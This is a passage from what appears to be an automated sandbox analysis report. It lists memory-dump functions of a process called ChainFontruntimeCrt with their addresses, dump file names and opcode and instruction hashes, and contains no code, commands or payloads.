                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 20dec677e550816c964a90edce15b60df9bfa6b2003e6bc7d912838622dea543
                                                                                                                        • Instruction ID: aeb7a331117ef6cf15d974f974d6b12ed4a15ed8d57729fd2c9fd79f4438867f
                                                                                                                        • Opcode Fuzzy Hash: 20dec677e550816c964a90edce15b60df9bfa6b2003e6bc7d912838622dea543
                                                                                                                        • Instruction Fuzzy Hash: 31212430A18A1D8FDB68EB54C4A4BA973E1EB98355F1107B9D00ED36B1CE34AE85CB44
                                                                                                                        Function 00007FFD9B7D391E Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac8b767f33e4cea83a5f023a3e2c32ac3c5f6a50c7c6e789741bb2676628215c
                                                                                                                        • Instruction ID: 5bb7ce5373799d24b3a6dd67ed2fedb68d4db98933bdf6bcc4cdd6f306aef77f
                                                                                                                        • Opcode Fuzzy Hash: ac8b767f33e4cea83a5f023a3e2c32ac3c5f6a50c7c6e789741bb2676628215c
                                                                                                                        • Instruction Fuzzy Hash: 1611A221F0DA1D4EE7B4A75888647FC7291EFC4350F5313BAD44ED31B2DD286A458750
                                                                                                                        Function 00007FFD9BBE169A Relevance: .1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 07ea3a5f35291144b3bba1a1552182e63ab98184548430174b460275453cff03
                                                                                                                        • Instruction ID: c5d540e83d36936efb72a52323d53629607a4bce59734beff5244bf8ba2d6928
                                                                                                                        • Opcode Fuzzy Hash: 07ea3a5f35291144b3bba1a1552182e63ab98184548430174b460275453cff03
                                                                                                                        • Instruction Fuzzy Hash: 6621A461B1F2CA8BE37B56A458345B97E503F42628F2A01FAE5899A0F3DD8C164593C3
                                                                                                                        Function 00007FFD9BBE45D0 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d99f167f1a6db857b9eece19f53ae6dfe44d33bc454d3e08df04269620fff8f
                                                                                                                        • Instruction ID: 3b98245cadb2f231e9f4fbb26f5dfb557390eca6fbf289c91ab0a8fde579e305
                                                                                                                        • Opcode Fuzzy Hash: 0d99f167f1a6db857b9eece19f53ae6dfe44d33bc454d3e08df04269620fff8f
                                                                                                                        • Instruction Fuzzy Hash: F211EB20A1E46E4EF638864484705BD7391FFD8305B1645BEC45F875FACA38FA8297C2
                                                                                                                        Function 00007FFD9BBE2969 Relevance: .1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 46a7761068eeb3829cbd8d033bd11446cfbf9744c9b46fb4394e171fb719c4e9
                                                                                                                        • Instruction ID: 0440cab7b6bf4d7bc25c5c560f8c9530038846f8aa66cc82bca64e38f7758060
                                                                                                                        • Opcode Fuzzy Hash: 46a7761068eeb3829cbd8d033bd11446cfbf9744c9b46fb4394e171fb719c4e9
                                                                                                                        • Instruction Fuzzy Hash: 51110431B0E74E5FE77096E448256AE3BA5FF56300F06017AD44AD71F2CE68694583D2
                                                                                                                        Function 00007FFD9BBEC859 Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dd2356dd521f5ba2b1ea663c9175bf94def09f58ef39feff63de0c54ab9e08f1
                                                                                                                        • Instruction ID: cef75d1d9babfeaf4228babd89d5732371e936876359fd1cf355bc474db03885
                                                                                                                        • Opcode Fuzzy Hash: dd2356dd521f5ba2b1ea663c9175bf94def09f58ef39feff63de0c54ab9e08f1
                                                                                                                        • Instruction Fuzzy Hash: 8F110431B0F64E6FE73496A488696FA3BE5FF46300F060076D04DD71F2DE586945C292
                                                                                                                        Function 00007FFD9B7D39B9 Relevance: .1, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3097b7819d093e01fa582601a5ebe3a499e921c0dd044cd33ede7039e8c8b03a
                                                                                                                        • Instruction ID: 766db127ad9f3095ffe57aeb7c2ad9b7aa06f4587d140472e1885350aa1c6ddd
                                                                                                                        • Opcode Fuzzy Hash: 3097b7819d093e01fa582601a5ebe3a499e921c0dd044cd33ede7039e8c8b03a
                                                                                                                        • Instruction Fuzzy Hash: 61112E61B0D60D8BEBA8E7688874AB83392EFD4750F1713B9D44EC31B2DD28A9468610
                                                                                                                        Function 00007FFD9BBE7999 Relevance: .1, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e4c1e8aeb8bc0130f109ce838be28fb13c1dcab58fcabe87fe902a7cbff3209a
                                                                                                                        • Instruction ID: 1d62a9f674c959e5b82b58dd5c203c3a7fcfebbc468ced2b19b4badf5c91a735
                                                                                                                        • Opcode Fuzzy Hash: e4c1e8aeb8bc0130f109ce838be28fb13c1dcab58fcabe87fe902a7cbff3209a
                                                                                                                        • Instruction Fuzzy Hash: A8112B32B0F78D5FE73086A548681EA3BE5EF45310F060076D04AC72F2DE586A4583D2
                                                                                                                        Function 00007FFD9BBED53C Relevance: .1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4236c08306c7a657e19a3a41e611d5c9c190c49ee0abae37050a871f3fc4e1de
                                                                                                                        • Instruction ID: 3f7c922c1df37eb1614602b6d48008220484bc79f01e0ea7e54b0b35f0d75271
                                                                                                                        • Opcode Fuzzy Hash: 4236c08306c7a657e19a3a41e611d5c9c190c49ee0abae37050a871f3fc4e1de
                                                                                                                        • Instruction Fuzzy Hash: 7C11016171DA898BC729DB64A4259EAB7D0FF44218B4105BED48ECB1E2CF28A5058391
                                                                                                                        Function 00007FFD9B7D0C38 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f2e65b5e072d1584c8404a2999deac6dc8bd60f0433338f76786ff235e369c4c
                                                                                                                        • Instruction ID: ba299c83d0f8e3c387e13f3b848c73a7104734dde692cf33c28e4e6beb292cc1
                                                                                                                        • Opcode Fuzzy Hash: f2e65b5e072d1584c8404a2999deac6dc8bd60f0433338f76786ff235e369c4c
                                                                                                                        • Instruction Fuzzy Hash: A611E335B0D74D8EE712DBA888201DC7BB0EF81651F4646B7C048CB1E2D9341A49C790
                                                                                                                        Function 00007FFD9BBE3650 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8b2967b6de9d2511aa37daf084eaa9949828eebab7dea0918f113a557cad6671
                                                                                                                        • Instruction ID: 2d99e5e6d9962b54734d6970703db2957d71425f130acc551037919a1b342853
                                                                                                                        • Opcode Fuzzy Hash: 8b2967b6de9d2511aa37daf084eaa9949828eebab7dea0918f113a557cad6671
                                                                                                                        • Instruction Fuzzy Hash: 4E11E721728A494FDB65DB65A061AEEB390FF44314F400679D44EC71E3CF29A5058781
                                                                                                                        Function 00007FFD9BBED3BE Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 809eb592075ffea81337dc5808d99bd7cd45f8048e0b4d45be6faa919de9d938
                                                                                                                        • Instruction ID: 32204a2092f357cd8e079c927ef6e81ede9c5a62424589433b7bf269d71ac0f0
                                                                                                                        • Opcode Fuzzy Hash: 809eb592075ffea81337dc5808d99bd7cd45f8048e0b4d45be6faa919de9d938
                                                                                                                        • Instruction Fuzzy Hash: 6411263630960A8FEB18CA58F4A53E9B790FB94318F15017EDD0AC75E1DB699550C7C1
                                                                                                                        Function 00007FFD9BBE8680 Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c6bbe907b0fc7da328afa37e42905c1e957668bd88d42debe3c6df94731da4b
                                                                                                                        • Instruction ID: 36e925bc82e1e2801f80548e3f435f9d9bb54e4ec32d0b2017596ea23868a333
                                                                                                                        • Opcode Fuzzy Hash: 3c6bbe907b0fc7da328afa37e42905c1e957668bd88d42debe3c6df94731da4b
                                                                                                                        • Instruction Fuzzy Hash: 80110230B28E494FDF64EB68B0616EA7790FF88208F4505BAD44EC36E6CF2DA50187C0
                                                                                                                        Function 00007FFD9BBE670A Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4486479923b62b82c9d68a0823b57c83e7ee02c1dd9d40ebec1ca276aae0805c
                                                                                                                        • Instruction ID: b5bd5a24a97576216baf93bdf69cd575b4829c5049a4fcbd40c6a4fab1f8f303
                                                                                                                        • Opcode Fuzzy Hash: 4486479923b62b82c9d68a0823b57c83e7ee02c1dd9d40ebec1ca276aae0805c
                                                                                                                        • Instruction Fuzzy Hash: 82015322F0F0AF86F7781AE424301BC65807F54369F5A027ADD0FA61FA9C0C2A4062D3
                                                                                                                        Function 00007FFD9BBE34CE Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 62d99088cd3a9f1eb2c2688d312a8d6ddb49a67fccdd5681937417345692d931
                                                                                                                        • Instruction ID: 641dcc9ca644ecdfe71fcf0b70c82103fd9a2fa5ebb3279d5376ff289ccc7da6
                                                                                                                        • Opcode Fuzzy Hash: 62d99088cd3a9f1eb2c2688d312a8d6ddb49a67fccdd5681937417345692d931
                                                                                                                        • Instruction Fuzzy Hash: C011663130860A4FEB16CB5CE4653E97380FF84328F15026EDC19C72E2CB299510C7C1
                                                                                                                        Function 00007FFD9BBE2B39 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b02784d24fe16d35532ce06c79ac465b08c82aa0ea9c87ef0415171c22e62f6a
                                                                                                                        • Instruction ID: 5f4d2b3749a97fe6ef2f16722350a6b394806e19e1940343f0dbed4f39634f5c
                                                                                                                        • Opcode Fuzzy Hash: b02784d24fe16d35532ce06c79ac465b08c82aa0ea9c87ef0415171c22e62f6a
                                                                                                                        • Instruction Fuzzy Hash: 0C01D271B19A4C4FEB54EBE8A8616ECB7A0FF49310F05016ED44DC32E3CF2968028741
                                                                                                                        Function 00007FFD9B7D0C40 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8658e3f75130754d2d45342cdb53bae2a466fc91405298982e9854081368744d
                                                                                                                        • Instruction ID: 3716f6a2bda8f107c6e891d7005231cc287eef0886ffe00a754542c14ed5c953
                                                                                                                        • Opcode Fuzzy Hash: 8658e3f75130754d2d45342cdb53bae2a466fc91405298982e9854081368744d
                                                                                                                        • Instruction Fuzzy Hash: 7601E135A0E38D8FE702DBA4C8601DD7BB0EF82750F4642B7C048CB1E2D9342A49C790
                                                                                                                        Function 00007FFD9BBEADA8 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d405da338cf28cf5921cfe2add91e0f6446d3c2fffee329912ebf3f08e4859d3
                                                                                                                        • Instruction ID: 65f13ee70fa31d36c1490795b87fc9b613746de4a18b7ef78cdbc490b6f26100
                                                                                                                        • Opcode Fuzzy Hash: d405da338cf28cf5921cfe2add91e0f6446d3c2fffee329912ebf3f08e4859d3
                                                                                                                        • Instruction Fuzzy Hash: 5911D334E1981EDFDBA8DB98D460AEDBBB1FF58305F514469E00AE32A0CA3869418B55
                                                                                                                        Function 00007FFD9BBE11A8 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 21482ba124e1b2382de92866599d87d366a7786fa58c37ec68d261aa463fb3bd
                                                                                                                        • Instruction ID: 6d999a5fc761d847d2f01a04c40c46734c341a2e2a5beaadc56b597c2d2ec322
                                                                                                                        • Opcode Fuzzy Hash: 21482ba124e1b2382de92866599d87d366a7786fa58c37ec68d261aa463fb3bd
                                                                                                                        • Instruction Fuzzy Hash: 0F11D334E1981EDFDF98DB88D860AEDB7B1FF58304F610069E00EE32A0DA3469018B52
                                                                                                                        Function 00007FFD9B7D20B7 Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6b67821d9fa556da4ba85a23e596b74b52fbaaac97670ff0cc4a70185fc4870a
                                                                                                                        • Instruction ID: d01926c5dee0ec917c423b8584c292dcc0b1998786d485adbc350738640efab1
                                                                                                                        • Opcode Fuzzy Hash: 6b67821d9fa556da4ba85a23e596b74b52fbaaac97670ff0cc4a70185fc4870a
                                                                                                                        • Instruction Fuzzy Hash: 58111E30918A1D8FDB69EF44C4A4BE9B3E1FB98304F1446A9C00DD76A4CB34AE85CF80
                                                                                                                        Function 00007FFD9BBE84FE Relevance: .0, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a94b82cb4afc70eb2f8d67c7e2a59af10ed72b333d043616f5a4b5f71b243e55
                                                                                                                        • Instruction ID: f4fc448074d04673b978b8d8bd098a0f5de554064f78b81eb745477f795ea5c8
                                                                                                                        • Opcode Fuzzy Hash: a94b82cb4afc70eb2f8d67c7e2a59af10ed72b333d043616f5a4b5f71b243e55
                                                                                                                        • Instruction Fuzzy Hash: 17012231319A4A4FEB14CA58F4A53E83790FB86318F1602AED919C72E2EB2A9540C780
                                                                                                                        Function 00007FFD9BBE5E1D Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9b09cd5654442f2aa9f3f4764f2241bf73855b3c729b8aa225541e16922dfe78
                                                                                                                        • Instruction ID: 1149d835df9282fdba84c5c941d32fb603e995b0a12825681956ad284b6df630
                                                                                                                        • Opcode Fuzzy Hash: 9b09cd5654442f2aa9f3f4764f2241bf73855b3c729b8aa225541e16922dfe78
                                                                                                                        • Instruction Fuzzy Hash: 22F0493154E2C54FC3129F74CC199957FE0EF5B21470A82EAD089CB962C66D85878711
                                                                                                                        Function 00007FFD9BBE5DE0 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 64bad9492d19bb15a8b90876e0787e012fd3598c3b06357f479c12d369fb34fa
                                                                                                                        • Instruction ID: c0bef454a2cc9438b66458ca1a3df019d4fb06a8a7dfe21b6da06364139fc750
                                                                                                                        • Opcode Fuzzy Hash: 64bad9492d19bb15a8b90876e0787e012fd3598c3b06357f479c12d369fb34fa
                                                                                                                        • Instruction Fuzzy Hash: ACF0B43554E2C85FC7219F748C154D57FE4EF5A11570642EAD089CB472C6298647C741
                                                                                                                        Function 00007FFD9B7D0C48 Relevance: .0, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 302b37573fca004b085174851480324be91e21b40ffeb5e4b71808b0b25efa86
                                                                                                                        • Instruction ID: 1cb151767bc2da61c65b663aa16b894908820bd7f3343c74b825d6adb9fd5cda
                                                                                                                        • Opcode Fuzzy Hash: 302b37573fca004b085174851480324be91e21b40ffeb5e4b71808b0b25efa86
                                                                                                                        • Instruction Fuzzy Hash: 2E01DE35A0E38D8FDB02DBA4C86049D7BB0EF42704F0682F7C048CB1A2D9386A48C780
                                                                                                                        Function 00007FFD9B7D39DE Relevance: .0, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a90174454672c4a8eca29de38b98fb972ca1a72a5339ebfc6577fb26de61a3a
                                                                                                                        • Instruction ID: 0d838d8c5ebaffac17e208c3df84980c2522075495d7fe164cd18730b01ebd0b
                                                                                                                        • Opcode Fuzzy Hash: 2a90174454672c4a8eca29de38b98fb972ca1a72a5339ebfc6577fb26de61a3a
                                                                                                                        • Instruction Fuzzy Hash: E6F01230A0D61E8BEB64A654C8646F873A1EFC4355F1613B9D44ED31B2DE286A868A10
                                                                                                                        Function 00007FFD9B7D0C50 Relevance: .0, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: af13cf6a0fbb9b883140ef5ab897dee918d54e7e9b534c88ba0aecb2292066e8
                                                                                                                        • Instruction ID: da4afde52aaa705dfe74a3a327422a935cfb892baadd95fbf66a50b3cd741781
                                                                                                                        • Opcode Fuzzy Hash: af13cf6a0fbb9b883140ef5ab897dee918d54e7e9b534c88ba0aecb2292066e8
                                                                                                                        • Instruction Fuzzy Hash: 2A017C34E0E38D9FEB12DBA488645AD7BB0EF46744F5543F7D048CB1A6D9386A48C781
                                                                                                                        Function 00007FFD9BBEBBC2 Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce14bb1166ef8b0ef0a4a6a4768827cfbb7ab08b705263a447b353f06bb387b8
                                                                                                                        • Instruction ID: 0a8dce9ab78d587c6a5db62f9c297a5f4ea7a050e04b5e05d90d81bebaecac9e
                                                                                                                        • Opcode Fuzzy Hash: ce14bb1166ef8b0ef0a4a6a4768827cfbb7ab08b705263a447b353f06bb387b8
                                                                                                                        • Instruction Fuzzy Hash: 91F0623144F2C99FD7228BB089B55D97FA4FF42208B1A00E6D4858B0B2DA6D5616C792
                                                                                                                        Function 00007FFD9BBE6D02 Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
